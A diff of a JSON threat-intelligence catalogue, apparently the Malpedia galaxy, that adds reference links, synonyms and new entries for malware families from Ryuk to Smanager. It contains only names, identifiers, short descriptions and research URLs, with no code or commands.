"https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", "https://0xc0decafe.com/2020/12/28/never-upload-ransomware-samples-to-the-internet/", + "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", "https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/", "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/", "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", "https://twitter.com/IntelAdvanced/status/1353546534676258816", "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf", "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/", "https://blog.emsisoft.com/en/35023/bug-in-latest-ryuk-decryptor-may-cause-data-loss/", "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://twitter.com/SecurityJoes/status/1402603695578157057", "https://github.com/scythe-io/community-threats/tree/master/Ryuk", "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/", @@ -27140,18 +31014,24 @@ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", "https://www.zdnet.com/article/dod-contractor-suffers-ransomware-infection/", "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes", + "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos/5768-ccn-cert-id-03-21-ryuk-ransomware/file.html", "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/", + "https://news.sophos.com/en-us/2021/05/06/mtr-in-real-time-pirates-pave-way-for-ryuk-ransomware/", "https://www.bleepingcomputer.com/news/security/steelcase-furniture-giant-hit-by-ryuk-ransomware-attack/", + "https://community.riskiq.com/article/c88cf7e6", "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/CORP_KNOWLEDGEBASE/91000/KB91844/en_US/McAfee%20Labs%20Threat%20Advisory%20-%20Ransom-Ryukv6.pdf", "https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/", "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon", "https://medium.com/ax1al/reversing-ryuk-eef8ffd55f12", + "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf", "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", "https://www.clearskysec.com/wp-content/uploads/2021/02/Conti-Ransomware.pdf", "https://www.secureworks.com/research/threat-profiles/gold-ulrick", "https://cofense.com/the-ryuk-threat-why-bazarbackdoor-matters-most/", "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/", "https://www.reuters.com/article/usa-healthcare-cyber-idUSKBN27E0EP", + "https://www.youtube.com/watch?v=HwfRxjV2wok", + "https://www.proofpoint.com/us/blog/threat-insight/q4-2020-threat-report-quarterly-analysis-cybersecurity-trends-tactics-and-themes", "https://www.youtube.com/watch?v=CgDtm05qApE", "https://research.nccgroup.com/2021/03/04/deception-engineering-exploring-the-use-of-windows-service-canaries-against-ransomware/", "https://unit42.paloaltonetworks.com/ryuk-ransomware/", @@ -27172,9 +31052,12 @@ "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware", "https://storage.pardot.com/652283/16118467480sqebwq7/MSP_Security_Summit___John_Hammond_Huntress___Analyzing_Ryuk.pdf", "https://www.bleepingcomputer.com/news/security/new-ryuk-info-stealer-targets-government-and-military-secrets/", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets", "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", "https://twitter.com/SophosLabs/status/1321844306970251265", "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware", + "https://4rchib4ld.github.io/blog/NiceToMeetYouRyuk/", "https://labs.sentinelone.com/an-inside-look-at-how-ryuk-evolved-its-encryption-and-evasion-techniques/", "https://blog.cyberint.com/ryuk-crypto-ransomware", "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", @@ -27184,6 +31067,7 @@ "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", "https://www.crowdstrike.com/blog/wizard-spider-adds-new-feature-to-ryuk-ransomware/", "https://www.bleepingcomputer.com/news/security/hacking-group-is-targeting-us-hospitals-with-ryuk-ransomware/", + "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/", "https://www.latimes.com/local/lanow/la-me-ln-times-delivery-disruption-20181229-story.html", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://www.bleepingcomputer.com/news/security/french-it-giant-sopra-steria-hit-by-ryuk-ransomware/", @@ -27193,17 +31077,22 @@ "https://securityliterate.com/reversing-ryuk-a-technical-analysis-of-ryuk-ransomware/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2019-ACT-005.pdf", "https://twitter.com/IntelAdvanced/status/1356114606780002308", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", "https://blog.talosintelligence.com/2020/06/CTIR-trends-q3-2020.html#more", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf", "https://www.domaintools.com/resources/blog/analyzing-network-infrastructure-as-composite-objects", + "https://www.heise.de/ct/artikel/Was-Emotet-anrichtet-und-welche-Lehren-die-Opfer-daraus-ziehen-4665958.html", + "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware", "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", "https://krebsonsecurity.com/2020/10/fbi-dhs-hhs-warn-of-imminent-credible-ransomware-threat-against-u-s-hospitals/", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", "https://decrypt.co/15394/how-ransomware-exploded-in-the-age-of-btc", "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/", "https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html", "https://www.youtube.com/watch?v=7xxRunBP5XA", + "https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://www.heise.de/ct/artikel/Was-Emotet-anrichtet-und-welche-Lehren-die-Opfer-daraus-ziehen-4665958.html", + "https://twitter.com/anthomsec/status/1321865315513520128", "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html" ], "synonyms": [], @@ -27217,17 +31106,21 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk_stealer", - "https://www.bleepingcomputer.com/news/security/ryuk-related-malware-steals-confidential-military-financial-files/", - "https://twitter.com/VK_Intel/status/1171782155581689858" + "https://www.crowdstrike.com/blog/sidoh-wizard-spiders-mysterious-exfiltration-tool/", + "https://analyst1.com/file-assets/Nationstate_ransomware_with_consecutive_endnotes.pdf", + "https://twitter.com/VK_Intel/status/1171782155581689858", + "https://www.bleepingcomputer.com/news/security/ryuk-related-malware-steals-confidential-military-financial-files/" + ], + "synonyms": [ + "Sidoh" ], - "synonyms": [], "type": [] }, "uuid": "0f0e5355-1dbf-4af4-aebf-88b08e6272a4", "value": "Ryuk Stealer" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sadogo", @@ -27237,7 +31130,7 @@ "type": [] }, "uuid": "188528f1-1292-4aaa-b1e6-3fe0ab78ff81", - "value": "Sadogo Ransomware" + "value": "Sadogo" }, { "description": "", @@ -27298,6 +31191,19 @@ "uuid": "08817c1e-3a90-4c9b-b332-52ebe72669c5", "value": "SaiGon" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.saint_bot", + "https://blog.malwarebytes.com/threat-analysis/2021/04/a-deep-dive-into-saint-bot-downloader/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "aa0afca8-551e-4fc7-a314-f541b80c6833", + "value": "Saint Bot" + }, { "description": "Sakula / Sakurel is a trojan horse that opens a back door and downloads potentially malicious files onto the compromised computer.", "meta": { @@ -27342,7 +31248,10 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sality", "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf", - "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P18-Kleissner-Sality.pdf" + "https://www.researchgate.net/profile/Lorenzo-De-Carli/publication/320250366_Botnet_protocol_inference_in_the_presence_of_encrypted_traffic/links/5fa9608792851cc286a08592/Botnet-protocol-inference-in-the-presence-of-encrypted-traffic.pdf?origin=publication_detail", + "https://unit42.paloaltonetworks.com/c2-traffic/", + "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P18-Kleissner-Sality.pdf", + "https://gist.githubusercontent.com/quangnh89/41deada8a936a1877a6c6c757ce73800/raw/41f27388a11a606e1d6a7596dcb6469578e79321/sality_extractor.py" ], "synonyms": [], "type": [] @@ -27369,16 +31278,21 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.samsam", "https://www.secureworks.com/research/threat-profiles/gold-lowell", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", "http://blog.talosintel.com/2016/03/samsam-ransomware.html", "https://sites.temple.edu/care/ci-rw-attacks/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", "https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/", + "https://www.secureworks.com/research/samsam-ransomware-campaigns", "https://www.justice.gov/opa/pr/two-iranian-men-indicted-deploying-ransomware-extort-hospitals-municipalities-and-public", + "https://www.secureworks.com/blog/ransomware-deployed-by-adversary", "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/samsam-ransomware-chooses-its-targets-carefully-wpna.aspx", "https://nakedsecurity.sophos.com/2018/05/01/samsam-ransomware-a-mean-old-dog-with-a-nasty-new-trick-report/", "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://www.secureworks.com/blog/samsam-converting-opportunity-into-profit", + "https://www.secureworks.com/blog/samas-ransomware", "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", "http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html", "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/" @@ -27399,9 +31313,7 @@ "https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", "http://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html" ], - "synonyms": [ - "Daws" - ], + "synonyms": [], "type": [] }, "uuid": "34c6504b-e947-49d8-a963-62b7594b7ef9", @@ -27464,7 +31376,7 @@ "value": "Sasfis" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.satan", @@ -27485,7 +31397,7 @@ "type": [] }, "uuid": "5639f7db-ab70-4b86-8a2f-9c4e3927ba91", - "value": "Satan Ransomware" + "value": "Satan" }, { "description": "", @@ -27637,7 +31549,7 @@ "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", "https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", @@ -27651,6 +31563,7 @@ "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", "https://github.com/Tera0017/SDBbot-Unpacker", "https://vblocalhost.com/uploads/VB2020-Jung.pdf", "https://www.secureworks.com/research/threat-profiles/gold-tahoe" @@ -27797,20 +31710,24 @@ "value": "seinup" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sekhmet", - "https://id-ransomware.blogspot.com/2020/03/sekhmet-ransomware.html", - "https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis", + "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/", "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf" + "https://id-ransomware.blogspot.com/2020/03/sekhmet-ransomware.html", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", + "https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/" ], "synonyms": [], "type": [] }, "uuid": "b4b4e8c8-fc66-4618-ba35-75f21d7d6922", - "value": "Sekhmet Ransomware" + "value": "Sekhmet" }, { "description": "", @@ -27827,7 +31744,7 @@ "value": "SendSafe" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sepsys", @@ -27839,7 +31756,7 @@ "type": [] }, "uuid": "08f37434-4aba-439f-afae-fed61f411ac4", - "value": "SepSys Ransomware" + "value": "SepSys" }, { "description": "", @@ -27872,12 +31789,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.servhelper", - "https://www.gdatasoftware.com/blog/2020/07/36122-hidden-miners", + "https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html", "https://insights.oem.avira.com/ta505-apt-group-targets-americas/", "https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/", + "https://securitynews.sonicwall.com/xmlpost/servhelper-2-0-enriched-with-bot-capabilities-and-allow-remote-desktop-access/", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf", + "https://medium.com/walmartglobaltech/ta505-adds-golang-crypter-for-delivering-miners-and-servhelper-af70b26a6e56", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", "https://ti.360.net/blog/articles/excel-4.0-macro-utilized-by-ta505-to-target-financial-institutions-recently-en/", "https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware", @@ -27885,11 +31804,12 @@ "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/servhelper-evolution-and-new-ta505-campaigns/", "https://www.deepinstinct.com/2019/04/02/new-servhelper-variant-employs-excel-4-0-macro-to-drop-signed-payload/", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://securitynews.sonicwall.com/xmlpost/servhelper-2-0-enriched-with-bot-capabilities-and-allow-remote-desktop-access/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/", "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part2/", - "https://www.secureworks.com/research/threat-profiles/gold-tahoe", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf" + "https://www.gdatasoftware.com/blog/2020/07/36122-hidden-miners", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://www.secureworks.com/research/threat-profiles/gold-tahoe" ], "synonyms": [], "type": [] @@ -27902,6 +31822,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowhammer", + "https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html", "https://countercept.com/blog/analysis-shadowhammer-asus-attack-first-stage-payload/", "https://mauronz.github.io/shadowhammer-backdoor", "https://www.vkremez.com/2019/03/lets-learn-dissecting-operation.html", @@ -27931,24 +31852,32 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad", - "https://securelist.com/shadowpad-in-corporate-networks/81432/", - "https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/", - "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/", - "https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf", - "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf", - "https://securelist.com/apt-trends-report-q2-2020/97937/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage", - "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/", - "https://securelist.com/apt-trends-report-q3-2020/99204/", - "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf", + "https://www.youtube.com/watch?v=_fstHQSK-kk", + "https://therecord.media/redecho-group-parks-domains-after-public-exposure/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan/", + "https://www.recordedfuture.com/redecho-targeting-indian-power-sector/", "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf", "https://www.youtube.com/watch?v=55kaaMGBARM", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf", + "https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf", + "https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/", + "https://securelist.com/shadowpad-in-corporate-networks/81432/", + "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/", + "https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", - "https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/" + "https://labs.sentinelone.com/shadowpad-a-masterpiece-of-privately-sold-malware-in-chinese-espionage/", + "https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html", + "https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf", + "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf", + "https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf", + "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/", + "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage" ], "synonyms": [ "POISONPLUG.SHADOW", @@ -28001,6 +31930,19 @@ "uuid": "6f9ed0b0-63c8-4f51-8425-17cfc2b3c12e", "value": "shareip" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shark", + "https://www.clearskysec.com/wp-content/uploads/2021/08/Siamesekitten.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d00c8f94-d6b5-40b7-b167-fc546c5dec38", + "value": "Shark" + }, { "description": "", "meta": { @@ -28022,9 +31964,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpstage", - "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign" + "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign", + "https://www.0ffset.net/reverse-engineering/malware-analysis/molerats-string-decryption/" + ], + "synonyms": [ + "LastConn" ], - "synonyms": [], "type": [] }, "uuid": "11788d9b-485b-4049-ba5e-1b06d526361e", @@ -28061,11 +32006,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shifu", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://securityintelligence.com/shifu-masterful-new-banking-trojan-is-attacking-14-japanese-banks/", "https://www.virusbulletin.com/virusbulletin/2015/11/shifu-rise-self-destructive-banking-trojan", - "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/" + "https://securityintelligence.com/shifu-masterful-new-banking-trojan-is-attacking-14-japanese-banks/" ], "synonyms": [], "type": [] @@ -28136,6 +32082,7 @@ "https://securityintelligence.com/merchant-of-fraud-returns-shylock-polymorphic-financial-malware-infections-on-the-rise/", "https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware", "https://securityintelligence.com/shylocks-new-trick-evading-malware-researchers/", + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", "https://www.europol.europa.eu/newsroom/news/global-action-targeting-shylock-malware", "https://www.virusbulletin.com/virusbulletin/2015/02/paper-pluginer-caphaw" ], @@ -28147,6 +32094,36 @@ "uuid": "515ee69a-298a-4fcf-bdb0-c5fc6d41872f", "value": "Shylock" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidetwist", + "https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3275503c-1f0a-4f6c-b13b-ec4ca2b29786", + "value": "SideTwist" + }, + { + "description": "Shellcode-based malware family that according to ESET Research was likely written by the same authors as win.crosswalk. ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewalk", + "https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/", + "https://documents.trendmicro.com/assets/white_papers/wp-earth-baku-an-apt-group-targeting-indo-pacific-countries.pdf", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware" + ], + "synonyms": [ + "ScrambleCross" + ], + "type": [] + }, + "uuid": "497d1e0f-dd0c-4462-b3e2-fb4a22f8333f", + "value": "SideWalk" + }, { "description": "", "meta": { @@ -28157,6 +32134,8 @@ "https://ti.qianxin.com/blog/articles/the-recent-rattlesnake-apt-organized-attacks-on-neighboring-countries-and-regions/", "https://www.secrss.com/articles/26507", "https://s.tencent.com/research/report/659.html", + "https://otx.alienvault.com/pulse/5fd10760f9afb730d37c4742/", + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder", "https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c", "https://s.tencent.com/research/report/479.html" ], @@ -28222,6 +32201,7 @@ "https://github.com/Tera0017/TAFOF-Unpacker", "http://www.intezer.com/silenceofthemoles/", "https://www.group-ib.com/resources/threat-research/silence.html", + "https://www.youtube.com/watch?v=FttiysUZmDw", "https://reaqta.com/2019/01/silence-group-targeting-russian-banks/", "https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf", "https://securelist.com/the-silence/83009/", @@ -28302,6 +32282,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sinowal", "https://www.recordedfuture.com/turla-apt-infrastructure/", + "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf", "https://www.virusbulletin.com/virusbulletin/2014/06/sinowal-banking-trojan", "https://www.symantec.com/security_response/writeup.jsp?docid=2008-010718-3448-99&tabid=2", "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", @@ -28352,6 +32333,20 @@ "uuid": "6d5e558a-e640-49c3-87b9-2c102c334b1b", "value": "Skimer" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.skinnyboy", + "https://cybergeeks.tech/skinnyboy-apt28/", + "https://cluster25.io/wp-content/uploads/2021/05/2021-05_FancyBear.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "fce8d9c9-7d83-4221-b726-5c49ea271109", + "value": "SkinnyBoy" + }, { "description": "A Microsoft SQL Server backdoor", "meta": { @@ -28380,7 +32375,9 @@ "https://blog.telsy.com/following-the-turlas-skipper-over-the-ocean-of-cyber-operations/", "https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/" ], - "synonyms": [], + "synonyms": [ + "Kotel" + ], "type": [] }, "uuid": "fac6313b-8068-429c-93ae-21e8072cf667", @@ -28502,6 +32499,19 @@ "uuid": "a8561caf-eb9f-4a02-8277-a898a0a259ae", "value": "smac" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.smackdown", + "https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/raw/master/2013/2013.05.20.Operation_Hangover/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "427dcec9-e2b9-44ad-bf58-281b7ba971bb", + "value": "Smackdown" + }, { "description": "", "meta": { @@ -28509,10 +32519,13 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smanager", "https://0xthreatintel.medium.com/reversing-apt-tool-smanager-unpacked-d413a04961c4", "https://blog.vincss.net/2020/12/phan-tich-ky-thuat-dong-ma-doc-moi-co-nhieu-dau-hieu-lien-quan-toi-nhom-tin-tac-Panda.html", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", "https://blog.vincss.net/2021/02/re020-elephantrat-kunming-version-our-latest-discovered-RAT-of-Panda.html", "https://0xthreatintel.medium.com/how-to-unpack-smanager-apt-tool-cb5909819214", "https://blog.vincss.net/2020/12/re018-2-analyzing-new-malware-of-china-panda-hacker-group-used-to-attack-supply-chain-against-vietnam-government-certification-authority.html?m=1", "https://blog.vincss.net/2020/12/re017-2-phan-tich-ky-thuat-dong-ma-doc-moi-co-nhieu-dau-hieu-lien-quan-toi-nhom-tin-tac-Panda.html", + "https://blog.group-ib.com/task", + 